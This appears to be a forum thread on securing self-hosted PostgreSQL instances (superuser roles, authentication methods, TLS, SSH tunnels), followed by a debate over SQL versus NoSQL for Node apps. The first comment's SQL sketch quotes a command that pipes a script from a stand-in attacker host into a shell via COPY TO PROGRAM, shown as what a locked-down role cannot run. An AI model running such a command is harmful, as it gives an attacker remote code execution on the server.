So this is cool, and can serve as a good cheatsheet for beginners.
However, the question I struggled with the most: how the hell do I set up a secure Postgres instance on some cloud VM or server? (I _really_ love those 2.50 bucks per month instances)
I spent a fair amount of time reading up on it, but it's still really easy to make a mistake in your `pg_hba.conf` or somewhere else. I remember disabling password-based login, and just authenticating over SSH, and my server still got compromised after a day or two. 100% my fault - I think it was related to `COPY FROM/TO` being able to run arbitrary commands because I didn't understand that `postgres` is regarded as a superuser by the database.
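In hindsight, the way to avoid that particular foot-gun would have been to never let the app log in as a superuser in the first place. A rough sketch (the role name is made up):

```sql
-- Give the app its own login role with no superuser bit, so server-side
-- features like COPY ... TO PROGRAM are refused for it.
CREATE ROLE app_rw LOGIN PASSWORD 'use-a-long-random-secret'
    NOSUPERUSER NOCREATEDB NOCREATEROLE;

-- A non-superuser that is not a member of pg_execute_server_program
-- cannot run something like:
--   COPY some_table TO PROGRAM 'curl https://evil.example | sh';
```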
I've been using managed services like Heroku Postgres and RDS ever since.
Point is: it would be of huge value to have a clear (but complete) overview of how to configure a Postgres instance so that it's secure in the basic sense. If that isn't possible (or very hard) then please let's collectively tell beginners to just use managed instances.
There ARE _almost_ clear guides about how to set up an RDS instance (and a basic webserver if you want), including networking, from AWS itself; it's just that these guides are buried under reams of SEOed listicle crap and mediocre Medium posts with no information. Will find and update this post.
Before anyone can reasonably answer this (and maybe dba.stackexchange.com would be a better place to ask), can you 100% confirm that the issue can't come from your ssh setup?
> I remember disabling password based login, and just authenticating over SSH, and my server still got compromised after a day or two.
This sentence in particular is hard to parse. Did you turn off password login in pg_hba.conf or in your sshd_config?
PS: VPS boxes literally start being scanned/tested over the standard ssh port minutes after being spun up. It seems less frequent, however, to be attacked for specific PostgreSQL vulnerabilities (but that might well be a new trend).
Have you read the official docs on the Postgres site? Most of that stuff is covered there. Not everything has to be in a blog post when the official docs already cover it.
I'm not sure where you went wrong; by default, Postgres is secure: the configuration listens on localhost and, even if you change that, it does not allow network access to the superuser. Distributions may ship with less secure configurations, but I'm not aware of any that do.
I'm also pretty sure that the upstream documentation warns against using the superuser for application access, so if you just create a regular database user protected by a reasonable password it will be as secure as any database exposed to a network can be; of course, exposing databases to the internet is something to be avoided in the first place.
non-mobile EDIT:
The above ignores TLS, which is generally a good idea if you want to make something accessible over the network.
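To make the above concrete, a rough sketch of "regular user, reasonable password, plus TLS" (database and role names are invented; run as the superuser):

```sql
SHOW listen_addresses;   -- 'localhost' by default, i.e. not reachable over the network
CREATE ROLE webapp LOGIN PASSWORD 'long-random-password';  -- ordinary role, not a superuser
GRANT CONNECT ON DATABASE mydb TO webapp;                  -- assumes a database called mydb
ALTER SYSTEM SET ssl = 'on';  -- TLS; also needs server.crt/server.key in the data directory
SELECT pg_reload_conf();
```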
A guide for beginners might be useful, but if you work with these things, it may be useful to learn how to approach security in general so that you will be able to learn how to secure anything, or at least know when you don't know enough.
In general, installing services securely requires the administrator to understand how the service is accessed by legitimate users and whether, in doing so, it is potentially exposed to external access. If you just google for how-tos, you're quite likely to find lots of bad advice that skips security considerations and takes you from A to B by the fastest route.
The effort required is entirely dependent on your requirements; in most cases, avoiding exposure to the internet, patching your software and using strong passwords is enough, as it stops nearly all low-effort automated attacks.
For starters with any network-exposed service, you should understand that not exposing it to the internet in the first place means that the rest of your security measures will be challenged less; so if you can, limit access to internal networks and specific hosts with firewalls and ACLs.
If you have to expose a service to the internet, then you need authentication and authorization; anyone will be able to connect to the service, but the service should challenge them to identify themselves using secure credentials.
Once the user has access to your service, you'll want to limit what they can do with it. This requires reading the manual.
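For example (a hedged sketch, with invented table and role names), "limiting what they can do" in Postgres mostly comes down to grants:

```sql
-- Don't let every role create objects in the public schema,
-- and grant the application only the access it actually needs.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
GRANT USAGE ON SCHEMA public TO webapp;
GRANT SELECT, INSERT, UPDATE ON orders, customers TO webapp;
-- no DELETE, no DDL, nothing outside these two tables
```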
Lastly, you'll generally want to keep your software up-to-date; unpatched software may have bugs that allow attackers to bypass some of the security measures you have set up.
> A guide for beginners might be useful, but if you work with these things, it may be useful to learn how to approach security in general so that you will be able to learn how to secure anything, or at least know when you don't know enough.
That's a tricky question. Personally, I find that while reading about something is a good way to gain a vague understanding of how something works, to actually integrate it, I need to actually get a system set up and then just dig around and see how things interact.
What could work is something akin to a Wikipedia dive. Pick a system to set up and make note of as many concepts along the way as you can. For example, setting up a Postgres database involves networking (what does a "listen address" actually mean?), different kinds of authentication (e.g. the pg_hba md5, trust, and peer authentication options), OS users and database users (easy to get those two confused), among other things. One could also wonder why there's a database superuser, and what makes the system such that using it for application access is a bad idea.
Then try thinking about potential ways of how all these things could interact to break a system. This can give you a lot of insight into how to secure systems against attackers.
For example, setting up Postgres to not authenticate users is not necessarily detrimental to the overall security of a system if everything is local and single-user, but makes the system extremely weak if any component on the host is exploitable from the outside.
So even if you really don't want to use passwords, you should at the very least use peer authentication where the database allows only specified OS users to connect such that any attacker must at least be able to access the system as one of those users.
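Those rules live in pg_hba.conf rather than in SQL. A hypothetical pair of entries, plus a way to inspect what the server actually loaded (the view exists since PostgreSQL 10):

```sql
-- Hypothetical pg_hba.conf lines, shown here as comments (the file itself is not SQL):
--   local   all   app_os_user                   peer
--   host    all   webapp        10.0.0.0/24     scram-sha-256
-- From psql, check which rules are in effect:
SELECT line_number, type, database, user_name, address, auth_method
FROM pg_hba_file_rules;
```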
Lastly, if you put a non-authenticating system on a network, it should not be surprising that anyone who happens to be able to poke at your network address can just waltz in without resistance. You'll at the very least want strong passwords, possibly with brute force detection to detect people trying to guess credentials. The IPv4 internet is only about 4 billion addresses, and automatically scanning through them for listening services is routine for attackers. :)
> Then try thinking about potential ways of how all these things could interact to break a system.
This is where your advice goes south, IMHO. The sysadmin can't think of every possible way their system can get compromised -- they are not paid for that, black-hat hackers are.
Instead of collecting settings from a hundred places that must be set correctly for production, and inventing ways the system can get compromised, the safe settings could be provided in one place: ideally in the default settings so they are impossible to miss, or in a list, such as Django's deployment checklist [1].
Not saying that Postgres doesn't provide such a list, although googling for "checklist site:postgresql.org" only resulted in a mailing list reply [2], with some points not trivial to follow. Please comment below if you know an official one.
Of course you don't need to think of every possible way to compromise a system; just enough to reasonably protect against your threat model given the resources you have. If you have a complicated system that requires "hundreds of settings", then you just have to put more effort in making sure you don't miss anything.
I'm pretty sure most security breaches are caused by really basic configuration mistakes (or process failures). Following a checklist can definitely be effective, but if you don't actually understand why you're configuring things as you are, you're likely to make mistakes elsewhere.
Who knows! That's my struggle with security: unless you have good monitoring in place, it's not even trivial to notice problems.
In my case I was only made aware of the compromised VM because my hosting provider sent me a very stern email about my server's IP netscanning their entire fricking address range.
How about trying to set up a box with exactly the same steps you would use for your database instance, except for actually installing the database? Yes, please include all the steps you may consider "irrelevant without a database installation"; they may well be important.
I guess that the docker image doesn't use TLS for connections, or if it does, it doesn't use certificates from a CA.
This means that your data either goes in plain text over the network, or might be vulnerable to a MITM attack (if you don't manage your certs correctly).
I also guess that you don't use SCRAM as the password hashing method, but rather MD5. That means that if someone is able to listen to the connection, they can do a replay attack using the password hash, as only 32 bits of entropy are added to the hash from the server side. And once you have managed to do the replay attack, you can issue arbitrary SQL commands as that user.
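If those guesses are right, the fix is fairly mechanical. A hedged sketch, run as a superuser and assuming you can afford to reset the affected passwords:

```sql
ALTER SYSTEM SET password_encryption = 'scram-sha-256';
SELECT pg_reload_conf();

-- Existing md5 hashes are not upgraded automatically; list the roles that
-- still need a password reset (reading pg_authid requires superuser):
SELECT rolname FROM pg_authid WHERE rolpassword LIKE 'md5%';

-- Then re-set those passwords (ALTER ROLE ... PASSWORD '...') and switch the
-- pg_hba.conf method from md5 to scram-sha-256. On the client side, use
-- sslmode=verify-full so the server certificate is actually checked.
```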
For about $7-8/month, you get a managed one on GCP with Cloud SQL. It isn't perfect for all use cases, but has been fantastic in terms of developing out a small app.
My experience is that managed services are either way too expensive or badly managed enough that doing anything different from the basics is an endless source of problems.
> Bit worried about the quality of the content, based on the quality of the proofreading.
I don't know why this feeling persists. The ability to proofread or write free of spelling errors is a skill completely unrelated to the underlying content. Complaining about the spelling just seems childish at this point. We live in a world full of mistakes and problems. Dealing with life despite them is a fundamental life skill.
There's definitely a middle ground here. I have been in academic contexts where every sentence has to be absolute perfection before we submit for publication. That's overkill, for sure, but there is merit to proofreading as a sign of legitimacy of the argument itself. Some dude literally wrote this text and didn't even re-read the post before publishing. Clearly, either he's such a great expert at technological things that they're even more second nature to him than LANGUAGE, or he just did a shoddy job on both fronts. Unless the name on it is Linus Torvalds or something, I'm just going to assume this post is low quality in general.
> The ability to proofread or write free of spelling errors is a skill completely unrelated to the underlying content.
It's not about the ability, but the willingness. I think it would be immoral to tolerate those bums who externalise costs onto the reader. https://www.fourmilab.ch/documents/strikeout/
The official documentation is pretty damn good. Most of the time when I needed to learn something about Postgres, it had all the answers I needed, and on the rare occasions it didn't, I used Stack Overflow to figure out what other part of the manual I needed to read.
If you need remote access to the DB, then you need remote access. Most people in a normal setup would not have the database server ports directly exposed to the Internet, but if you have the perspective that all servers are in the cloud, then you would also be expected to know how to keep them secure.
But making it listen on an external IP does not inherently make it insecure, as long as you also have other firewall and user account controls.
I don't know much about Postgres specifically, but what I'm seeing in the tutorial does seem insecure.
> If you need remote access to the DB, then you need remote access
That's not a defence for teaching insecure practices. It's possible to configure Postgres for secure remote access.
Using md5 for password security seems like a red flag, and sure enough, the Postgres docs remind us that md5 should no longer be considered secure. [0] I don't think there's any verification of the server's fingerprint, either.
There's really no excuse here, as there's a quick and easy way to do it: SSH tunnels. [1]
> Most people in a normal setup would not have the database server ports directly exposed to the Internet
Not a safe assumption. Instances on Linode and, iirc, Digital Ocean, are not behind a cloud firewall, all ports are wide open to the Internet. (I think that's a bad move on the part of Linode and Digital Ocean, but that's not the point.)
> if you have the perspective that all servers are in the cloud, then you would also be expected to know how to keep them secure
If you already knew how to securely configure Postgres, you wouldn't need the tutorial.
> making it listen on an external IP does not inherently make it insecure, as long as you also have other firewall and user account controls
Is there a good way to embed postgres in applications? I've preferred sqlite and would like to just use postgres everywhere, but requiring users to install it as a service and maintain that globally just makes it unreliable for embedding.
Related side note/question. I was on a project recently where postgres was used with a NodeJS JavaScript server app. It seems a bit backwards: you have the flexibility of a loosely typed server app but all the annoyance of an RDBMS. It just made development a nightmare. The 'strictness' of the system was just backwards.
Surely NoSQL + typescript is better for development (and potentially for performance).
I see it the other way around. Code is fluid, data persists. So I would expect more rigor in the design of the schema than anywhere in the code. And hopefully, with some foresight, you won't have to change it every other day. Migrating the data also requires some reflection.
No amount of coding will fix your data if it is a mountain of inconsistent garbage.
I guess with experience comes the ability to correctly design the schema from day one. The project was just getting off the ground, so the schema was evolving constantly. If only there were such a thing as pgconfig.json which allows me to configure how strict I want the db to be - a sliding scale from NoSQL to SQL.
No one gets the schema right from the beginning. Waterfall is out of fashion for a reason. And there are schema migration frameworks out there for that purpose.
If you care for the data you store, you'll have to take care of your data. ACID and the "rigidness" of schemata are tools for that, and to keep the complexity in check.
It is much easier than accruing technical debt by having unstructured data and later having to figure out how to make heads or tails of what you and your colleagues did at some arbitrary earlier time. (Not that crappy SQL designs don't have that problem.)
If you don't care about your data yet, as in the beginning, why not just recreate the DB from scratch each time? You can use various editors to create the schemata with tools you are more comfortable with.
Don't work against the tool, and find the slider in your head to adjust your way of working.
This is already solved in most server-side frameworks by using a schema migration tool. Heck, even WordPress has an easy way to automatically update a table's schema. The development of these tools in nodejs land is probably stalled due to the nodejs community's obsession with NoSQL databases, but I bet there are several solutions available right now to handle this task.
As someone who works on a business app using CouchDB+Typescript, I can tell you that (a) you will also hit the edge cases of NoSQL, like transactions and joins, and it will not be that awesome either and (b) at some point you'll realize that you'll need to do schema validation still. Frontend bugs, possibly malicious clients and protected attributes (i.e. 'disabled' should only be set by an admin) will force you to write a lot of validation anyway.
It definitely allows for faster iteration, though. You can deploy a prototype or change very quickly without caring about this, which is pretty nice. But you need to keep track of that and pay the debt if you use the prototype.
Overall, I think it would not make much difference if we were using PostgreSQL + some JSON column for general data instead of CouchDB. You just need to know your stack and its drawbacks and work with them.
I have written a lot of server side code in dynamically typed languages (mostly Python) with a variety of database systems (I started my career in the mid 2000s on ZODB, an object-oriented database).
At least in my experience, the "philosophical" language-database pairing always ended up being much less important than the database's own strengths and weaknesses with regard to the problem being solved.
For me, Postgres is the best default choice if you don't yet understand well where your project/product is going (not saying it isn't a good choice later on as well). Out of the box it handles pretty much every use case I've encountered at least well enough for a long time, without adding supplemental data stores or ugly hacks.
For me, the difference in development barely matters. Locally, schema changes are pretty much frictionless with the right tooling, and in production the problem is usually not changing the schema, but the existing data. The latter is a pain in any tech I have used so far, because often it is not even an engineering challenge but a matter of business decisions.
I've done this before (postgREST) for internal apps and it's amazing. You can POST a JSON file to the front end from a shell script with curl and have it show up on a Grafana dashboard immediately. I've used this in the past for setting up automated quality tests for machine learning pipelines -- the pipeline runs automatically and you get the results in a central place, so you can see how your quality metrics are trending over time.
Given that postgREST exists, I don't see any reason to talk to postgres directly from a JS app.
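For the curious, a rough sketch of what the Postgres side of such a setup can look like (table and role names are invented; the exact grants depend on how you configure PostgREST):

```sql
-- A results table for the pipeline to POST into and for Grafana to read.
CREATE TABLE quality_metrics (
    id         bigserial PRIMARY KEY,
    pipeline   text        NOT NULL,
    metrics    jsonb       NOT NULL,
    created_at timestamptz NOT NULL DEFAULT now()
);

-- A role PostgREST can switch to; it may only read and insert into this table.
CREATE ROLE web_writer NOLOGIN;
GRANT USAGE ON SCHEMA public TO web_writer;
GRANT SELECT, INSERT ON quality_metrics TO web_writer;
GRANT USAGE ON SEQUENCE quality_metrics_id_seq TO web_writer;
```

PostgREST then exposes the table as an endpoint you can POST to with curl, and Grafana can read the same table over its regular Postgres data source.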
As someone who loves JavaScript and used MongoDB in a serious, professional setting - you are eventually doing more work with Mongo to keep data in sync than with any relational database.
Most systems do not need NoSQL. The only reason to use NoSQL is when you are allowing users to create completely dynamic form schemas and JSON, or when your product is garbage and you need a "quick" db for prototyping.
That's not to mention that when your product grows and you are selling to "serious" corporations, they ask you to integrate with third-party data visualization / analysis software. They claim to support MongoDB/No-SQL in their marketing material, but virtually none of them do, and you are mapping back to SQL. That's when the cost of using no-SQL really hits, several years down the line.
> your product is garbage and you need a "quick" db for prototyping.
Yep that's the stage the project was at.
Integrating the DB with grafana was a breeze though so that's definitely a benefit. I've personally never tried to hook up a MongoDB to Grafana, wonder if it's any easier.
This is my primary stack now, except for Typescript instead of Javascript, and I absolutely love it.
First, the ideological thing: flexibility is an awful thing for users' data and the logical relationships within it. The fact that with an RDBMS you have to define your schema and follow it turns many classes of errors that would have been corrupted data in operations into exceptions during development: PostgreSQL just won't let you shoot yourself in the foot like that. And with pgtyped, which I'm growing to love, you don't even have to write any boilerplate: just write plain straightforward SQL, run verification against your test database, and get all of your types for free.
But that's not even the most important part; what I absolutely love about SQL is my ability to delegate huge amounts of work from my app server to my db server, saving a lot of latency and CPU. It may not be that critical for things when you just update one row in the 'users' table, but when you have O(n) updates and up, it's just great to be able to do things directly in the database.
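As a hedged illustration (table names invented), the O(n) case is exactly where one set-based statement beats n round trips from the app server:

```sql
-- Apply all pending payments in a single statement instead of looping in JS.
-- Pre-aggregating per account avoids the "only one joined row per target row"
-- pitfall of UPDATE ... FROM.
UPDATE accounts AS a
SET    balance = balance + p.total
FROM  (SELECT account_id, sum(amount) AS total
       FROM pending_payments
       GROUP BY account_id) AS p
WHERE  p.account_id = a.id;
```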
And on the rare occasions where you absolutely have to use non-structured data (or data with a lot of different data types that don't deserve their own columns), jsonb is useful and pretty damn fast if you think through the schema and make use of GIN indexes.
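A minimal sketch of that jsonb pattern (names invented):

```sql
CREATE TABLE events (
    id      bigserial PRIMARY KEY,
    kind    text  NOT NULL,     -- well-known fields stay as real columns
    payload jsonb NOT NULL      -- the long tail of attributes goes into jsonb
);
CREATE INDEX events_payload_gin ON events USING gin (payload jsonb_path_ops);

-- Containment queries like this one can use the GIN index:
SELECT id FROM events WHERE payload @> '{"browser": "firefox"}';
```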
thanks for the pgtyped recommendation! I guess I was just frustrated with the constant moaning from the DB side when schemas were constantly being reconsidered. JSONb to the rescue though!
I think it's a good compromise. You're accepting a lot of looseness and fault-tolerance on the application side, but you have guaranteed safety of your underlying data.
What scares me more than anything else is lost / compromised / invalid data. That's hard to fix. The frontend code is straightforward to fix, relatively speaking.
I forgot to mention this was at a startup at ground level. Regular data backups always soothe my nerves. Eventually it makes sense to have type/db strictness on both the app and db side; however, it just felt like wading through quicksand with a small team where we should be sprinting while the db structure is fluid and ever-changing.
When you have the tooling in place, it's relatively easy to remodel your data in Postgres. I use alembic (python), so most of the schema changes are handled for me - and then I need to write any updates to fill in the gaps. It doesn't matter what you're using, though: if you're restructuring data, you need to handle the changes yourself to get from one consistent state to another. Postgres allows you to do this so you don't end up in some horrible halfway house where you've kinda migrated, but kinda not, because you missed something. DB-level constraints are the best, especially when you have a bunch of legacy data to worry about.
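In plain SQL, "getting from one consistent state to another" usually looks something like this (column and table names are made up; this is roughly the kind of change a migration tool would emit):

```sql
BEGIN;
ALTER TABLE users ADD COLUMN display_name text;                        -- new, nullable for now
UPDATE users SET display_name = username WHERE display_name IS NULL;   -- backfill existing rows
ALTER TABLE users ALTER COLUMN display_name SET NOT NULL;              -- only then add the constraint
COMMIT;
```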
> The 'strictness' of the system was just backwards.
IMO, the strictness was in the right place (the source of truth), what was probably backwards is the team’s relative skill and tooling for adapting the solution. Which might make it wrong for the team, if it is otherwise right for the situation.
I don't understand why I've been downvoted to -3 here. I'm sure if I just showed off how much I hate technology and live in a cave then I'd get lots of upvotes. Hacker news is wild.